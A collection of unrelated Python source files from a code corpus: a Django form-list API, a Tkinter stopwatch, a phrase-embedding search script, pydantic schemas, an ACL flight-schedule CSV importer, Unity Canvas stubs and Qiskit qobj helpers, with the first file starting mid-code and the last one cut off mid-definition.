prev_tags = (git(path, formatstring) .strip(' \n') .replace('"', '') .replace("'", '') .split('\n')) if not DRYRUN: if len(prev_tags) == 1: prev_tags.append('master') # Get the URL of the tag comparison page. urls.append(get_github_url( team, repo, '/compare/{previous_tag}...{latest_tag}'.format( previous_tag=prev_tags[1], latest_tag=prev_tags[0] ) )) if urls: urls = '\n'.join(urls) print urls pbcopy(urls) if __name__ == '__main__': main()
StarcoderdataPython
1650740
from __future__ import unicode_literals from rest_framework import serializers from rest_framework.response import Response from rest_framework.decorators import detail_route from django.db.models import Q from onadata.apps.fieldsight.models import Site # from onadata.apps.main.models.meta_data import MetaData from onadata.apps.api.viewsets.xform_list_api import XFormListApi from onadata.apps.fsforms.models import FieldSightXF from onadata.apps.fsforms.serializers.FieldSightXFormSerializer import FSXFormListSerializer from onadata.apps.fsforms.serializers.FieldSightXformManifestSerializer import FSXFormManifestSerializer class AssignedXFormListApi(XFormListApi): serializer_class = FSXFormListSerializer queryset = FieldSightXF.objects.all() template_name = 'fsforms/assignedFormList.xml' def filter_queryset(self, queryset): if self.request.user.is_anonymous(): self.permission_denied(self.request) site_id = self.kwargs.get('site_id', None) queryset = queryset.filter(site__id=site_id, site__isnull=False, is_deployed=True) return queryset @detail_route(methods=['GET']) def manifest(self, request, *args, **kwargs): if kwargs.get('site_id') == '0': self.object = FieldSightXF.objects.get(pk=kwargs.get('pk')) else: self.object = self.get_object() object_list = [] context = self.get_serializer_context() serializer = FSXFormManifestSerializer(object_list, many=True, context=context) return Response(serializer.data, headers=self.get_openrosa_headers()) def list(self, request, *args, **kwargs): self.object_list = self.filter_queryset(self.get_queryset()) serializer = self.get_serializer(self.object_list, many=True) return Response(serializer.data, headers=self.get_openrosa_headers()) def project_forms(self, request, *args, **kwargs): self.object_list = self.queryset.filter(Q(project__id=kwargs.get('project_id'), site__isnull=True, is_deleted=False, is_deployed=True) | Q(project__id=kwargs.get('project_id'), site__isnull=True, is_survey=True, is_deleted=False, is_deployed=True)) serializer = self.get_serializer(self.object_list, many=True) return Response(serializer.data, headers=self.get_openrosa_headers()) def site_overide_forms(self, request, *args, **kwargs): self.object_list = self.queryset.filter(Q(site__project_id=kwargs.get('project_id'), fsform__isnull=True, project__isnull=True, is_deployed=True, is_deleted=False) | Q(site__project_id=kwargs.get('project_id'), from_project=False, is_deployed=True, is_deleted=False)) serializer = self.get_serializer(self.object_list, many=True) return Response(serializer.data, headers=self.get_openrosa_headers())
StarcoderdataPython
3212413
#!/usr/bin/env python # Author: cptx032 # Mail-me: <EMAIL> from Tkinter import * top = Tk() SEC = 0 HOUR = 0 MIN = 0 PAUSED = True MINIMIZED = False top.withdraw() top.config(bg="#333") top.overrideredirect(1) top.attributes("-alpha",0.9, "-topmost",1) top.geometry("%dx%d+%d+0" % (200, top.winfo_screenheight(), top.winfo_screenwidth()-200)) top.deiconify() top.focus_force() la = Label(top, font=("TkDefaultFont",18),text="test",justify=RIGHT,fg="white",bg="#333") la.pack(pady=5, padx=5,anchor=E, expand=YES,fill=Y) top.bind("<Escape>", lambda e:top.destroy(), "+") def _update_time(*args): top.after(1000, _update_time) if not PAUSED: return global HOUR, MIN, SEC SEC += 1 if SEC == 60: SEC = 0 MIN += 1 if MIN == 60: HOUR += 1 MIN = 0 la["text"] = ":chrom\n%02d:%02d:%02d" % (HOUR, MIN, SEC) _update_time() def _fix_win_bar_problem(*arg): top.after(1, _fix_win_bar_problem) top.attributes("-top",1) _fix_win_bar_problem() def _handler_pause(*args): global PAUSED PAUSED = not PAUSED top.bind("<1>", _handler_pause, "+") def _handler_clear(*args): global HOUR, MIN, SEC HOUR, MIN, SEC = 0,0,0 la["text"] = ":chrom\n00:00:00" top.bind("<3>", _handler_clear, "+") def _handler_quit(*args): top.destroy() # top.bind("<2>", _handler_quit, "+") def _handler_minimize(*args): global MINIMIZED if not MINIMIZED: MINIMIZED = True top.geometry("%dx%d+%d+0" % (20, top.winfo_screenheight(), top.winfo_screenwidth()-20)) else: MINIMIZED = False top.geometry("%dx%d+%d+0" % (200, top.winfo_screenheight(), top.winfo_screenwidth()-200)) top.bind("<MouseWheel>", _handler_minimize, "+") def _h_focus_in(*args): top["bg"] = "#333" la["bg"] = "#333" #top.bind("<FocusIn>", _h_focus_in, "+") def _h_focus_out(*args): top["bg"] = "#ddd" la["bg"] = "#ddd" #top.bind("<FocusOut>", _h_focus_out, "+") top.mainloop()
StarcoderdataPython
3227915
""" A script to embed every phrase in a dataset as a dense vector, then to find the top-k neighbors of each phrase according to cosine similarity. 1. Install missing dependencies. # More details: https://github.com/facebookresearch/faiss/blob/master/INSTALL.md conda install faiss-cpu -c pytorch 2. Prepare data. For example, the chunking dataset from CoNLL 2000. wget https://www.clips.uantwerpen.be/conll2000/chunking/train.txt.gz gunzip train.txt.gz python diora/misc/convert_conll_to_jsonl.py --path train.txt > conll-train.jsonl 3. Run this script. python diora/scripts/phrase_embed.py \ --batch_size 10 \ --emb w2v \ --embeddings_path ~/data/glove.6B/glove.6B.50d.txt \ --hidden_dim 50 \ --log_every_batch 100 \ --save_after 1000 \ --data_type conll_jsonl \ --validation_path ./conll-train.jsonl \ --validation_filter_length 10 Can control the number of neighbors to show with the `--k_top` flag. Can control the number of candidates to consider with `--k_candidates` flag. """ import json import types import itertools import torch import numpy as np from train import argument_parser, parse_args, configure from train import get_validation_dataset, get_validation_iterator from train import build_net from diora.logging.configuration import get_logger try: import faiss from faiss import normalize_L2 except: print('Could not import `faiss`, which is used to find nearest neighbors.') def get_cell_index(entity_labels, i_label=0, i_pos=1, i_size=2): def helper(): for i, lst in enumerate(entity_labels): for el in lst: if el is None: continue pos = el[i_pos] size = el[i_size] label = el[i_label] yield (i, pos, size, label) lst = list(helper()) if len(lst) == 0: return None, [] batch_index = [x[0] for x in lst] positions = [x[1] for x in lst] sizes = [x[2] for x in lst] labels = [x[3] for x in lst] return batch_index, positions, sizes, labels def get_many_cells(diora, chart, batch_index, positions, sizes): cells = [] length = diora.length idx = [] for bi, pos, size in zip(batch_index, positions, sizes): level = size - 1 offset = diora.index.get_offset(length)[level] absolute_pos = offset + pos idx.append(absolute_pos) cells = chart[batch_index, idx] return cells def get_many_phrases(batch, batch_index, positions, sizes): batch = batch.tolist() lst = [] for bi, pos, size in zip(batch_index, positions, sizes): phrase = tuple(batch[bi][pos:pos+size]) lst.append(phrase) return lst class BatchRecorder(object): def __init__(self, dtype={}): super(BatchRecorder, self).__init__() self.cache = {} self.dtype = dtype self.dtype2flatten = { 'list': self._flatten_list, 'np': self._flatten_np, 'torch': self._flatten_torch, } def _flatten_list(self, v): return list(itertools.chain(*v)) def _flatten_np(self, v): return np.concatenate(v, axis=0) def _flatten_torch(self, v): return torch.cat(v, 0).cpu().data.numpy() def get_flattened_result(self): def helper(): for k, v in self.cache.items(): flatten = self.dtype2flatten[self.dtype.get(k, 'list')] yield k, flatten(v) return {k: v for k, v in helper()} def record(self, **kwargs): for k, v in kwargs.items(): self.cache.setdefault(k, []).append(v) class Index(object): def __init__(self, dim=None): super(Index, self).__init__() self.D, self.I = None, None self.index = faiss.IndexFlatIP(dim) def add(self, vecs): self.index.add(vecs) def cache(self, vecs, k): self.D, self.I = self.index.search(vecs, k) def topk(self, q, k): for j in range(k): idx = self.I[q][j] dist = self.D[q][j] yield idx, dist class NearestNeighborsLookup(object): def __init__(self): super(NearestNeighborsLookup, self).__init__() def run(options): logger = get_logger() validation_dataset = get_validation_dataset(options) validation_iterator = get_validation_iterator(options, validation_dataset) word2idx = validation_dataset['word2idx'] embeddings = validation_dataset['embeddings'] idx2word = {v: k for k, v in word2idx.items()} logger.info('Initializing model.') trainer = build_net(options, embeddings, validation_iterator) diora = trainer.net.diora # 1. Get all relevant phrase vectors. dtype = { 'example_ids': 'list', 'labels': 'list', 'positions': 'list', 'sizes': 'list', 'phrases': 'list', 'inside': 'torch', 'outside': 'torch', } batch_recorder = BatchRecorder(dtype=dtype) ## Eval mode. trainer.net.eval() batches = validation_iterator.get_iterator(random_seed=options.seed) logger.info('Beginning to embed phrases.') with torch.no_grad(): for i, batch_map in enumerate(batches): sentences = batch_map['sentences'] batch_size = sentences.shape[0] length = sentences.shape[1] # Skips very short examples. if length <= 2: continue _ = trainer.step(batch_map, train=False, compute_loss=False) entity_labels = batch_map['entity_labels'] batch_index, positions, sizes, labels = get_cell_index(entity_labels) # Skip short phrases. batch_index = [x for x, y in zip(batch_index, sizes) if y >= 2] positions = [x for x, y in zip(positions, sizes) if y >= 2] labels = [x for x, y in zip(labels, sizes) if y >= 2] sizes = [y for y in sizes if y >= 2] cell_index = (batch_index, positions, sizes) batch_result = {} batch_result['example_ids'] = [batch_map['example_ids'][idx] for idx in cell_index[0]] batch_result['labels'] = labels batch_result['positions'] = cell_index[1] batch_result['sizes'] = cell_index[2] batch_result['phrases'] = get_many_phrases(sentences, *cell_index) batch_result['inside'] = get_many_cells(diora, diora.inside_h, *cell_index) batch_result['outside'] = get_many_cells(diora, diora.outside_h, *cell_index) batch_recorder.record(**batch_result) result = batch_recorder.get_flattened_result() # 2. Build an index of nearest neighbors. vectors = np.concatenate([result['inside'], result['outside']], axis=1) normalize_L2(vectors) index = Index(dim=vectors.shape[1]) index.add(vectors) index.cache(vectors, options.k_candidates) # 3. Print a summary. example_ids = result['example_ids'] phrases = result['phrases'] assert len(example_ids) == len(phrases) assert len(example_ids) == vectors.shape[0] def stringify(phrase): return ' '.join([idx2word[idx] for idx in phrase]) for i in range(vectors.shape[0]): topk = [] for j, score in index.topk(i, options.k_candidates): # Skip same example. if example_ids[i] == example_ids[j]: continue # Skip string match. if phrases[i] == phrases[j]: continue topk.append((j, score)) if len(topk) == options.k_top: break assert len(topk) == options.k_top, 'Did not find enough valid candidates.' # Print. print('[query] example_id={} phrase={}'.format( example_ids[i], stringify(phrases[i]))) for rank, (j, score) in enumerate(topk): print('rank={} score={:.3f} example_id={} phrase={}'.format( rank, score, example_ids[j], stringify(phrases[j]))) if __name__ == '__main__': parser = argument_parser() parser.add_argument('--k_candidates', default=100, type=int) parser.add_argument('--k_top', default=3, type=int) options = parse_args(parser) configure(options) run(options)
StarcoderdataPython
1601582
<filename>app/schemas.py from typing import List from pydantic import BaseModel # the orm model tells the Pydantic model to read the data even it it # is not a dict, but an ORM model (or any other arbitrary object with attributes). class MarketBase(BaseModel): id: int market_name: str country_code: str market_id: str class Market(MarketBase): id: int market_id: str market_name: str country_code: str class Config: orm_mode = True class QCWholesaleBase(BaseModel): market_name: str product: str source: str start: str end: str timeliness: str data_length: str completeness: str duplicates: str mode_D: str class QCWholesale(QCWholesaleBase): market_name: str product: str source: str start: str end: str timeliness: str data_length: str completeness: str duplicates: str mode_D: str class Config: orm_mode = True
StarcoderdataPython
48703
## ACL Import Module # ACL CSV Import # Version 5 # 2015-10-30 # we only need the datetime class & the static function strptime from datetime module from datetime import datetime import re import sys import os import logging # best postgresql module so far, install it "yum install python-psycopg2" import psycopg2 import csv import shutil from tempfile import mkstemp module_logger = logging.getLogger('acl') _sql={ 'schd' : """ insert into acl_schd ( source, acl_id, flight_id, carrier_id, leg_id, airline_iata, airline_icao, flightnumber, codeshare, operating_flightnumber, flight_date, std, "off", "out", down, "on", sta, eta, ata, origin_iata, origin_icao, destination_iata, destination_icao, airport_iata, airport_icao, last_next_iata, last_next_icao, orig_dest_iata, orig_dest_icao, aircraft_iata, aircraft_icao, seats, pax, lastupdated, flight_type, pax_flight, origin_status, destination_status, etd, atd, arr_dep, oag_type, flight_transid, voyageid ) select source, acl_id as acl_id, null as flight_id, null as carrier_id, null as leg_id, airline_iata, airline_icao, acl_flightnumber as flightnumber, 0 as codeshare, null as operating_flightnumber, acl_date as flight_date, (case when acl_arrdep = 'D' then flight_datetime end) as std, null as off, null as out, null as down, null as on, (case when acl_arrdep = 'A' then flight_datetime end) as sta, null as eta, null as ata, acl_origin as origin_iata, acl_origin_icao as origin_icao, acl_dest as destination_iata, acl_dest_icao as destination_icao, acl_airport as airport_iata, airport_icao as airport_icao, acl_last_next_iata as last_next_iata, acl_last_next_icao as last_next_icao, acl_orig_dest_iata as orig_dest_iata, acl_orig_dest_icao as orig_dest_icao, acl_aircraft_iata as aircraft_iata, acl_aircraft_icao as aircraft_icao, null as seats, null as pax, lastupdated at time zone 'UTC' as lastupdated, acl_service_type as flight_type, servicetype_pax::int as pax_flight, null as origin_status, null as destination_status, null as etd, null as atd, acl_arrdep as arr_dep, null as oag_type, null as flight_transid, ( acl_origin || acl_dest || to_char(acl_date,'YYYYMMDD') || btrim(coalesce(airline_iata,airline_icao)) || btrim(acl_flightnumber) || acl_arrdep) as voyageid from ( select A.acl_id, A.acl_file_date, A.acl_date, A.acl_time, A.acl_arrdep, A.acl_airport, A.acl_last_next_iata, A.acl_orig_dest_iata, A.acl_aircraft_iata, A.acl_last_next_icao, A.acl_orig_dest_icao, A.acl_aircraft_icao, A.acl_operator_airline_code, A.acl_flightnumber, A.acl_service_type, A.acl_aircraft_reg, A.acl_edit_date, OFA.airline_iata, OFA.airline_icao, OF1.airport_icao, -- calculated fields A.acl_date + A.acl_time at time zone 'UTC' as flight_datetime, --A.acl_date + A.acl_time as flight_datetime, (case when A.acl_arrdep = 'D' then A.acl_airport else A.acl_last_next_iata end) as acl_origin, (case when A.acl_arrdep = 'A' then A.acl_airport else A.acl_last_next_iata end) as acl_dest, (case when A.acl_arrdep = 'D' then OF1.airport_icao else A.acl_last_next_icao end) as acl_origin_icao, (case when A.acl_arrdep = 'A' then OF1.airport_icao else A.acl_last_next_icao end) as acl_dest_icao, T.servicetype_pax, source_type as source, source_date as lastupdated from acl_csv A join history H on H.source_type='A' join of_airlines OFA on ( OFA.airline_iata = A.acl_operator_airline_code and OFA.airline_active='Y' ) or OFA.airline_icao = A.acl_operator_airline_code left join of_airports OF1 on OF1.airport_iata = A.acl_airport left join servicetypes T on acl_service_type = servicetype_code where acl_file_type = 3 and acl_file_date > coalesce( ( select A.acl_file_date from acl_csv A join ( select max(acl_id) as acl_id, max(lastupdated) as lastupdated from ( select max(acl_id) as acl_id, max(lastupdated) as lastupdated from schd where source='A' group by lastupdated UNION select max(acl_id) as acl_id, max(lastupdated) as lastupdated from acl_schd where source='A' group by lastupdated ) Z ) B on B.acl_id = A.acl_id ), '2015-01-01'::date) -- and acl_file_date >= '2015-09-14'::date and acl_date > acl_file_date -- because acl data turns up nearly 24 hours late ) Z """, 'copy' : """ copy acl_csv ( acl_aircraft_iata, acl_aircraft_reg, acl_airport, acl_arrdep, acl_created_date, acl_date, acl_doop, acl_edit_date, acl_aircraft_icao, acl_last_next_icao, acl_orig_dest_icao, acl_last_next_iata, acl_last_next_country, acl_operator_airline_code, acl_operator_group_name, acl_operator_name, acl_orig_dest_iata, acl_orig_dest_country, acl_terminal_name, acl_season, acl_seats, acl_flightnumber, acl_service_type, acl_turnaround, acl_terminal, acl_time, acl_turn_operator_airline_code, acl_turn_flightnumber, acl_flightdesignator, acl_loadfactor ) from stdin with csv header """, 'history' : """ update history set source_date = now() where source_type='A' """, 'update' : """ update acl_csv set acl_filename = %s, acl_file_date = %s, acl_file_type = %s where acl_filename is null """, 'last' : """ select extract(epoch from source_date) as lastupdated from history where source_type='A' """, 'file_check' : """ select acl_filename from acl_csv where acl_filename = %(filename)s """, 'lock_acl_schd' : """ LOCK TABLE acl_schd IN ACCESS EXCLUSIVE MODE """ } # import an ACL CSV file # Args: # dbh = database handle (psycopg2) # filename = csv filename def importfile(dbh, filename): module_logger.info("Import %s", filename) status=1 message='OK' if os.path.isfile(filename): # break the file name into useful parts # optional airport & season prefix we actually ignore eg "LHRS15" # mandatory "HOMEOFFICEROLL" # mandatory integer filetype usually 1 or 3 or 180 # manatory file date in YYYYMMDD # note case insensitive as we have been given files with both uppercase and lowercase filenames match = re.search('^(.*?)homeofficeroll(\d+)_(\d{4}\d{2}\d{2})\.csv$', os.path.basename(filename), re.I) if match is not None: date = datetime.strptime(match.group(3), '%Y%m%d').date() filetype= match.group(2) module_logger.info("Importing %s", filename) module_logger.debug("Processing File %s Date %s File Type %s Filename %s", filename, date, filetype, os.path.basename(filename)) # copy data use postgresql copy command, pyscopg2 allows use to do so from a python file handle via "stdin" csr=dbh.cursor() try: f=open(filename) csr.copy_expert(sql=_sql['copy'], file=f) # add file info to the rows we just imported csr.execute(_sql['update'], (os.path.basename(filename), date, filetype)) module_logger.debug("Q %s", csr.query) module_logger.debug("R %s", csr.statusmessage) csr.execute(_sql['history']) module_logger.debug("Q %s", csr.query) module_logger.debug("R %s", csr.statusmessage) # gain an AccessExlusive lock on the acl_schd table to prevent race condition with schd.py csr.execute(_sql['lock_acl_schd']) module_logger.debug("Q %s", csr.query) module_logger.debug("R %s", csr.statusmessage) csr.execute(_sql['schd']) module_logger.debug("Q %s", csr.query) module_logger.debug("R %s", csr.statusmessage) csr.close() module_logger.debug("Commit") dbh.commit() status=1 except: module_logger.exception("Rollback") csr.close() dbh.rollback() status=-2 message="Error processing "+filename module_logger.error("Error processing %s", filename) finally: f.close() else: status=-2 message="Invalid filename skipping "+filename module_logger.warning("File name doesn't match %s", filename) else: status=-2 message="File not found"+filename module_logger.error("File not found %s", filename) return status,message # end def importfile def _sortkey(filename): match = re.search('^(.*?)homeofficeroll(\d+)_(\d{4}\d{2}\d{2})(.*?)$', filename, re.I) key='' if match is not None: key=match.group(3) return key #end def _sortkey def validate_file(f , renamebad=True, baddir=None): #logger=logging.getLogger() if baddir is not None: if not os.path.exists(baddir): os.makedirs(baddir) module_logger.info("Validating %s", f) ok=True header=False rewritten=False header_row=0 rowcount=0 tf=None with open(f, 'rb') as file: reader = csv.reader(file) for row in reader: if not header: if len(row) == 30 and row[0] == 'A/C': header=True else: header_row+=1 else: if len(row) != 30: ok=False module_logger.info("Incorrect Row Size %s", rowcount) rowcount+=1 # end for if not header: ok=False module_logger.info("No Header found") if header and header_row > 0: module_logger.info("Extra Header Rows found") fh, tf = mkstemp() file.seek(0) reader = csv.reader(file) with open(tf, 'wb') as tmpfile: writer = csv.writer(tmpfile) r=0 for row in reader: if r >= header_row: writer.writerow(row) r+=1 module_logger.info("Rewrite file") rewritten=True if ok and rewritten and tf is not None: nf=None if renamebad: nf=f+'.bad' os.rename(f,nf) else: nf=os.path.join(baddir, os.path.basename(f)) os.rename(f,nf) os.rename(tf,f) module_logger.info("Corrected %s Moved Bad File to %s", f, nf) if not ok: nf=None if renamebad: nf=f+'.bad' os.rename(f,nf) else: nf=os.path.join(baddir, os.path.basename(f)) os.rename(f,nf) module_logger.info("Moved Bad File %s to %s", f, nf) return ok #end def validate_file def import_folder(dbh, sourcedir, archivedir=None, debug=False): status=1 message='OK' archivemode=False if archivedir is not None and archivedir != sourcedir: archivemode=True if not os.path.exists(archivedir): os.makedirs(archivedir) #retrieve last imported file date/time csr=dbh.cursor() filecount=0 if os.path.isdir(sourcedir): filelist=sorted(os.listdir(sourcedir), key = _sortkey) if filelist is not None: for filename in filelist: f=os.path.join(sourcedir, filename) if os.path.isfile(f): # is it a .done file? match = re.search('^((.*?)homeofficeroll(\d+)_(\d{4}\d{2}\d{2})\.csv)\.done$', filename, re.I) if match is not None: # extract corresponding csv name & check it csvfilename=match.group(1) cf=os.path.join(sourcedir, csvfilename) if os.path.isfile(cf) and validate_file(cf, False, archivedir): csr.execute(_sql['file_check'], { 'filename': csvfilename } ) # if the filename isn't found if csr.rowcount == 0: module_logger.debug("F %s",cf) module_logger.info("Importing %s", cf) status, message=importfile(dbh, cf) if status != 1: module_logger.debug("Status %s bailing", status) break filecount+=1 # only archive if status is good & archivedir if archivemode: nf=os.path.join(archivedir, csvfilename) os.rename(cf,nf) # remove the .done file os.unlink(f) #end for if filecount == 0: module_logger.error("No files imported") message='No files imported' else: module_logger.info("%s files imported", filecount) message="%s files imported" % filecount else: module_logger.error("No files found") status=-2 message='No files found to import' else: status=-2 module_logger.error("%s not a folder", sourcedir) message="Source Folder not found "+sourcedir csr.close() return status, message # end def findfiles
StarcoderdataPython
170911
from typing import overload from UdonPie import System from UdonPie import UnityEngine from UdonPie.Undefined import * class Canvas: def __new__(cls, arg1=None): ''' :returns: Canvas :rtype: UnityEngine.Canvas ''' pass @staticmethod def op_Implicit(arg1): ''' :param arg1: Object :type arg1: UnityEngine.Object :returns: Boolean :rtype: System.Boolean ''' pass @staticmethod def op_Equality(arg1, arg2): ''' :param arg1: Object :type arg1: UnityEngine.Object :param arg2: Object :type arg2: UnityEngine.Object :returns: Boolean :rtype: System.Boolean ''' pass @staticmethod def op_Inequality(arg1, arg2): ''' :param arg1: Object :type arg1: UnityEngine.Object :param arg2: Object :type arg2: UnityEngine.Object :returns: Boolean :rtype: System.Boolean ''' pass @staticmethod def add_willRenderCanvases(arg1): ''' :param arg1: WillRenderCanvases :type arg1: UnityEngine.WillRenderCanvases ''' pass @staticmethod def remove_willRenderCanvases(arg1): ''' :param arg1: WillRenderCanvases :type arg1: UnityEngine.WillRenderCanvases ''' pass @staticmethod def get_isRootCanvas(): ''' :returns: Boolean :rtype: System.Boolean ''' pass @staticmethod def get_pixelRect(): ''' :returns: Rect :rtype: UnityEngine.Rect ''' pass @staticmethod def get_scaleFactor(): ''' :returns: Single :rtype: System.Single ''' pass @staticmethod def set_scaleFactor(arg1): ''' :param arg1: Single :type arg1: System.Single or float ''' pass @staticmethod def get_referencePixelsPerUnit(): ''' :returns: Single :rtype: System.Single ''' pass @staticmethod def set_referencePixelsPerUnit(arg1): ''' :param arg1: Single :type arg1: System.Single or float ''' pass @staticmethod def get_overridePixelPerfect(): ''' :returns: Boolean :rtype: System.Boolean ''' pass @staticmethod def set_overridePixelPerfect(arg1): ''' :param arg1: Boolean :type arg1: System.Boolean or bool ''' pass @staticmethod def get_pixelPerfect(): ''' :returns: Boolean :rtype: System.Boolean ''' pass @staticmethod def set_pixelPerfect(arg1): ''' :param arg1: Boolean :type arg1: System.Boolean or bool ''' pass @staticmethod def get_planeDistance(): ''' :returns: Single :rtype: System.Single ''' pass @staticmethod def set_planeDistance(arg1): ''' :param arg1: Single :type arg1: System.Single or float ''' pass @staticmethod def get_renderOrder(): ''' :returns: Int32 :rtype: System.Int32 ''' pass @staticmethod def get_overrideSorting(): ''' :returns: Boolean :rtype: System.Boolean ''' pass @staticmethod def set_overrideSorting(arg1): ''' :param arg1: Boolean :type arg1: System.Boolean or bool ''' pass @staticmethod def get_sortingOrder(): ''' :returns: Int32 :rtype: System.Int32 ''' pass @staticmethod def set_sortingOrder(arg1): ''' :param arg1: Int32 :type arg1: System.Int32 or int ''' pass @staticmethod def get_sortingLayerID(): ''' :returns: Int32 :rtype: System.Int32 ''' pass @staticmethod def set_sortingLayerID(arg1): ''' :param arg1: Int32 :type arg1: System.Int32 or int ''' pass @staticmethod def get_cachedSortingLayerValue(): ''' :returns: Int32 :rtype: System.Int32 ''' pass @staticmethod def get_additionalShaderChannels(): ''' :returns: AdditionalCanvasShaderChannels :rtype: UnityEngine.AdditionalCanvasShaderChannels ''' pass @staticmethod def set_additionalShaderChannels(arg1): ''' :param arg1: AdditionalCanvasShaderChannels :type arg1: UnityEngine.AdditionalCanvasShaderChannels ''' pass @staticmethod def get_sortingLayerName(): ''' :returns: String :rtype: System.String ''' pass @staticmethod def set_sortingLayerName(arg1): ''' :param arg1: String :type arg1: System.String or str ''' pass @staticmethod def get_rootCanvas(): ''' :returns: Canvas :rtype: UnityEngine.Canvas ''' pass @staticmethod def get_normalizedSortingGridSize(): ''' :returns: Single :rtype: System.Single ''' pass @staticmethod def set_normalizedSortingGridSize(arg1): ''' :param arg1: Single :type arg1: System.Single or float ''' pass @staticmethod def GetDefaultCanvasMaterial(): ''' :returns: Material :rtype: UnityEngine.Material ''' pass @staticmethod def GetETC1SupportedCanvasMaterial(): ''' :returns: Material :rtype: UnityEngine.Material ''' pass @staticmethod def ForceUpdateCanvases(): pass @staticmethod def get_enabled(): ''' :returns: Boolean :rtype: System.Boolean ''' pass @staticmethod def set_enabled(arg1): ''' :param arg1: Boolean :type arg1: System.Boolean or bool ''' pass @staticmethod def get_transform(): ''' :returns: Transform :rtype: UnityEngine.Transform ''' pass @staticmethod def get_gameObject(): ''' :returns: GameObject :rtype: UnityEngine.GameObject ''' pass @staticmethod @overload def GetComponent(arg1): ''' :param arg1: Type :type arg1: System.Type :returns: Component :rtype: UnityEngine.Component ''' pass @staticmethod @overload def GetComponent(arg1): ''' :param arg1: String :type arg1: System.String or str :returns: Component :rtype: UnityEngine.Component ''' pass @staticmethod def GetComponent(arg1=None): pass @staticmethod @overload def GetComponentInChildren(arg1, arg2): ''' :param arg1: Type :type arg1: System.Type :param arg2: Boolean :type arg2: System.Boolean or bool :returns: Component :rtype: UnityEngine.Component ''' pass @staticmethod @overload def GetComponentInChildren(arg1): ''' :param arg1: Type :type arg1: System.Type :returns: Component :rtype: UnityEngine.Component ''' pass @staticmethod def GetComponentInChildren(arg1=None, arg2=None): pass @staticmethod @overload def GetComponentsInChildren(arg1, arg2): ''' :param arg1: Type :type arg1: System.Type :param arg2: Boolean :type arg2: System.Boolean or bool :returns: ComponentArray :rtype: UnityEngine.ComponentArray ''' pass @staticmethod @overload def GetComponentsInChildren(arg1): ''' :param arg1: Type :type arg1: System.Type :returns: ComponentArray :rtype: UnityEngine.ComponentArray ''' pass @staticmethod @overload def GetComponentsInChildren(arg1, arg2): ''' :param arg1: Boolean :type arg1: System.Boolean or bool :param arg2: Undefined variable :type arg2: ListT.ListT ''' pass @staticmethod @overload def GetComponentsInChildren(arg1): ''' :param arg1: Undefined variable :type arg1: ListT.ListT ''' pass @staticmethod def GetComponentsInChildren(arg1=None, arg2=None): pass @staticmethod @overload def GetComponentInParent(arg1): ''' :param arg1: Type :type arg1: System.Type :returns: Component :rtype: UnityEngine.Component ''' pass @staticmethod def GetComponentInParent(arg1=None): pass @staticmethod @overload def GetComponentsInParent(arg1, arg2): ''' :param arg1: Type :type arg1: System.Type :param arg2: Boolean :type arg2: System.Boolean or bool :returns: ComponentArray :rtype: UnityEngine.ComponentArray ''' pass @staticmethod @overload def GetComponentsInParent(arg1): ''' :param arg1: Type :type arg1: System.Type :returns: ComponentArray :rtype: UnityEngine.ComponentArray ''' pass @staticmethod @overload def GetComponentsInParent(arg1, arg2): ''' :param arg1: Boolean :type arg1: System.Boolean or bool :param arg2: Undefined variable :type arg2: ListT.ListT ''' pass @staticmethod def GetComponentsInParent(arg1=None, arg2=None): pass @staticmethod @overload def GetComponents(arg1): ''' :param arg1: Type :type arg1: System.Type :returns: ComponentArray :rtype: UnityEngine.ComponentArray ''' pass @staticmethod @overload def GetComponents(arg1, arg2): ''' :param arg1: Type :type arg1: System.Type :param arg2: Undefined variable :type arg2: SystemCollectionsGenericList.SystemCollectionsGenericList ''' pass @staticmethod @overload def GetComponents(arg1): ''' :param arg1: Undefined variable :type arg1: ListT.ListT ''' pass @staticmethod def GetComponents(arg1=None, arg2=None): pass @staticmethod def GetInstanceID(): ''' :returns: Int32 :rtype: System.Int32 ''' pass @staticmethod def GetHashCode(): ''' :returns: Int32 :rtype: System.Int32 ''' pass @staticmethod def Equals(arg1): ''' :param arg1: Object :type arg1: System.Object :returns: Boolean :rtype: System.Boolean ''' pass @staticmethod def get_name(): ''' :returns: String :rtype: System.String ''' pass @staticmethod def set_name(arg1): ''' :param arg1: String :type arg1: System.String or str ''' pass @staticmethod def ToString(): ''' :returns: String :rtype: System.String ''' pass @staticmethod def GetType(): ''' :returns: Type :rtype: System.Type ''' pass
StarcoderdataPython
3284583
# -*- coding: utf-8 -*- from django.conf import settings from django.http.response import Http404 def restrict_for_museum(func): def view(request, *args, **kwargs): if request.user.is_authenticated() and request.user.profile.is_museum: raise Http404() return func(request, *args, **kwargs) return view
StarcoderdataPython
4805830
<filename>backend/app/schemas/chat/messages.py """Message schemas.""" from datetime import datetime from pydantic import BaseModel, Field from ..base import MongoModel, MongoId class Message(BaseModel): """Base Message schema.""" text: str class MessageIn(Message): """Input Message schema.""" class MessageOut(MongoModel, Message): """Output Message schema.""" table_id: MongoId user_id: MongoId created_at: datetime class MessageDB(MessageOut): """Database Message schema.""" created_at: datetime = Field(default_factory=datetime.utcnow)
StarcoderdataPython
60216
# -*- coding: utf-8 -*- # This code is part of Qiskit. # # (C) Copyright IBM 2018, 2019. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """Utilities related to Qobj.""" from typing import Dict, Any, Optional, Union, List from qiskit.qobj import QobjHeader, QasmQobj, PulseQobj def _serialize_noise_model(config: Dict[str, Any]) -> Dict[str, Any]: """Traverse the dictionary looking for ``noise_model`` keys and apply a transformation so it can be serialized. Args: config: The dictionary to traverse. Returns: The transformed dictionary. """ for k, v in config.items(): if isinstance(config[k], dict): _serialize_noise_model(config[k]) else: if k == 'noise_model': try: config[k] = v.to_dict(serializable=True) except AttributeError: # if .to_dict() fails is probably because the noise_model # has been already transformed elsewhere pass return config def update_qobj_config( qobj: Union[QasmQobj, PulseQobj], backend_options: Optional[Dict] = None, noise_model: Any = None ) -> Union[QasmQobj, PulseQobj]: """Update a ``Qobj`` configuration from backend options and a noise model. Args: qobj: Description of the job. backend_options: Backend options. noise_model: Noise model. Returns: The updated ``Qobj``. """ config = qobj.config.to_dict() # Append backend options to configuration. if backend_options: for key, val in backend_options.items(): config[key] = val # Append noise model to configuration. Overwrites backend option if noise_model: config['noise_model'] = noise_model # Look for noise_models in the config, and try to transform them config = _serialize_noise_model(config) # Update the Qobj configuration. qobj.config = QobjHeader.from_dict(config) return qobj def 